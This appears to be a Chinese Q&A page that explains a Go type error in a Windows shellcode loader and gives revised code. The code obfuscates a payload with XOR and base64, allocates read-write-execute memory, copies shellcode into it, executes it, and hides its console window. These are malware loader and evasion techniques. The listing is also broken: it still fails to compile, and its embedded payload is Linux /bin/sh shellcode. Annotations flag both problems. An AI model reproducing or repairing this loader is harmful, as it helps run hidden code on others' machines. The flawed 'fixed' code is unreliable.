代码中使用了 syscall 包和 unsafe.Pointer,这些都是与系统交互的低级操作,需要小心使用。

报错信息是:

# command-line-arguments
./main.go:81:51: cannot use shellCodeHex (type []byte) as type uintptr in argument to syscall.Syscall

这是因为 syscall.Syscall 的参数必须是 uintptr 类型,而代码直接把 []byte 类型的 shellCodeHex 传了进去。切片不能直接当作 uintptr 使用,需要先取切片首元素的地址,再通过 unsafe.Pointer 转换为 uintptr。

修改后的代码(注意:main 中仍然把 unsafe.Pointer 传给参数类型为 []byte 的 exec,这一行类型不匹配,代码依然无法通过编译):

package main

import (
	"encoding/base64"
	"syscall"
	"time"
	"unsafe"

	"github.com/lxn/win"
)

// Win32 memory-management flag values passed to VirtualAlloc by exec. The names
// mirror the Windows SDK identifiers, hence the ALL_CAPS spelling.
const (
	// Allocation type: commit the pages.
	MEM_COMMIT             = 0x1000
	// Allocation type: reserve the address range.
	MEM_RESERVE            = 0x2000
	// Page protection: readable, writable and executable at the same time (RWX).
	// Pages that are both writable and executable break W^X and are a common
	// signal for memory scanners and endpoint detection rules.
	PAGE_EXECUTE_READWRITE = 0x40
)

// XorKey holds three 8-byte key rows for XorCipher. Only XorKey[0] is read by
// the Encode and Decode functions in this file; the other rows are unused here.
// A key embedded in the binary gives no confidentiality: anyone holding the
// binary can recover it, so this is obfuscation only.
var XorKey = [][]byte{
	// NOTE(review): 077 is an octal literal (decimal 63, 0x3F), not 0x77. The
	// second row has 0x77 in the same position, so this may be a typo — confirm.
	{0x13, 0x54, 077, 0x1A, 0xA1, 0x3F, 0x04, 0x8B},
	{0x13, 0x54, 0x77, 0x69, 0x97, 0x3F, 0x33, 0x2B},
	{0x31, 0x23, 0x37, 0x19, 0x91, 0x3F, 0x50, 0x9B},
}

// CipherFunc is the signature shared by the byte transforms that Crypt can
// dispatch to: it takes a key and a source buffer and returns the transformed
// bytes. XorCipher is the only implementation in this file.
type CipherFunc func(key []byte, src []byte) []byte

// XorCipher returns a copy of src in which every byte has been XOR-ed with
// every byte of key in turn.
//
// Because XOR is associative, applying all key bytes to one source byte is the
// same as applying a single mask byte (the XOR of the whole key). The transform
// is therefore a one-byte XOR regardless of key length, and applying it twice
// with the same key restores the input. It is obfuscation, not encryption.
//
// The result is nil when src is empty.
func XorCipher(key []byte, src []byte) []byte {
	// Fold the key once; the per-byte result is identical to XOR-ing with each
	// key byte separately.
	var mask byte
	for _, k := range key {
		mask ^= k
	}

	var out []byte
	for _, b := range src {
		out = append(out, b^mask)
	}
	return out
}

// Crypt applies the supplied cipher function to src with key and returns
// whatever that function returns. It adds no behaviour of its own; it only
// lets callers choose the transform.
func Crypt(cipher CipherFunc, key []byte, src []byte) []byte {
	out := cipher(key, src)
	return out
}

// Encode masks src with XorCipher under XorKey[0] and returns the result as a
// standard-alphabet base64 string. Decode reverses it. The key is compiled into
// the program, so this hides bytes from casual inspection only.
func Encode(src []byte) string {
	masked := Crypt(XorCipher, XorKey[0], src)
	return base64.StdEncoding.EncodeToString(masked)
}

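// Decode reverses Encode: it base64-decodes src (standard alphabet) and then
// removes the XorCipher mask using XorKey[0].
//
// It returns nil when src is not valid base64. The signature has no error
// result, so a nil slice is the only failure signal available to callers.
func Decode(src string) []byte {
	decodedBytes, err := base64.StdEncoding.DecodeString(src)
	if err != nil {
		// DecodeString hands back the bytes decoded before the error; do not
		// unmask and return that partial prefix as if it were the whole input.
		return nil
	}
	return Crypt(XorCipher, XorKey[0], decodedBytes)
}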

// Lazily resolved Windows DLL handles and procedures used by exec.
// NewLazyDLL/NewProc do not load anything at declaration time; the DLL is
// loaded and the symbol looked up on first use.
var (
	kernel32      = syscall.NewLazyDLL("kernel32.dll")
	ntdll         = syscall.NewLazyDLL("ntdll.dll")
	// VirtualAlloc is called by exec to obtain the destination region.
	VirtualAlloc  = kernel32.NewProc("VirtualAlloc")
	// RtlMoveMemory is called by exec to copy the buffer into that region.
	RtlMoveMemory = ntdll.NewProc("RtlMoveMemory")
)

// exec allocates a read-write-execute region with VirtualAlloc, copies charcode
// into it with RtlMoveMemory, and then calls the start of that region as a
// function through syscall.Syscall. It returns nothing and reports no errors.
//
// Defender note: allocating PAGE_EXECUTE_READWRITE memory, copying a data
// buffer into it and transferring control there is the in-process code-loading
// sequence that endpoint monitoring and memory scanners key on. Processes that
// have no legitimate need to generate code at run time can be constrained with
// policies that forbid dynamic code (for example Windows Arbitrary Code Guard).
func exec(charcode []byte) {
	// NOTE(review): the second and third results (including the error) are
	// discarded, so a failed allocation (addr == 0) is not detected and the
	// following calls would operate on address 0.
	addr, _, _ := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
	// time.Duration counts nanoseconds, so this sleeps 5 ns, not 5 seconds.
	time.Sleep(5)
	// NOTE(review): &charcode[0] panics with an index-out-of-range error when
	// charcode is empty; the copy result is ignored as well.
	_, _, _ = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
	// Same 5 ns sleep as above.
	time.Sleep(5)
	// Calls addr as a function with zero arguments; the return values are dropped.
	syscall.Syscall(addr, 0, 0, 0, 0)
}

// main builds a byte buffer from a hard-coded literal, passes it through
// Encode and then Decode, hides the console window, and hands the buffer to
// exec.
func main() {
	// Raw bytes written as \x escapes. NOTE(review): the literal contains the
	// ASCII strings "//sh" and "/bin" and ends in cd 80, so it appears to be a
	// 32-bit Linux sample rather than Windows code — confirm before drawing
	// conclusions from this listing.
	payload := "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
	// Encode followed immediately by Decode with the same key is a round trip:
	// shellCodeHex ends up holding the same bytes as payload.
	encodedPayload := Encode([]byte(payload))
	shellCodeHex := Decode(encodedPayload)
	// Hides this process's console window. A console program that hides its own
	// window at startup is a behaviour worth noting during triage.
	win.ShowWindow(win.GetConsoleWindow(), win.SW_HIDE)
	// NOTE(review): this call does not type-check. exec is declared in this
	// file as exec(charcode []byte), but the argument here is an unsafe.Pointer,
	// so the program as listed still fails to compile.
	exec(unsafe.Pointer(&shellCodeHex[0]))
}
Go 代码报错:syscall.Syscall 参数类型错误

原文地址: https://www.cveoy.top/t/topic/lP5l 著作权归作者所有。请勿转载和采集!
